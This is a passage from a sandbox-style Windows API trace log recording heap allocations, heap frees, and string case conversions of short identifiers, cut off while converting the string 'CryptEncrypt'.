0x2aab8c0 [0222.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0222.001] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0222.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0222.002] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0222.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0222.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0222.003] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0222.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0222.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0222.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0222.003] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0222.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0222.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0222.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0222.005] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0222.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a739c8 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.006] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0222.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0222.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739c8 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0222.007] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0222.007] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0222.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0222.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0222.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0222.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 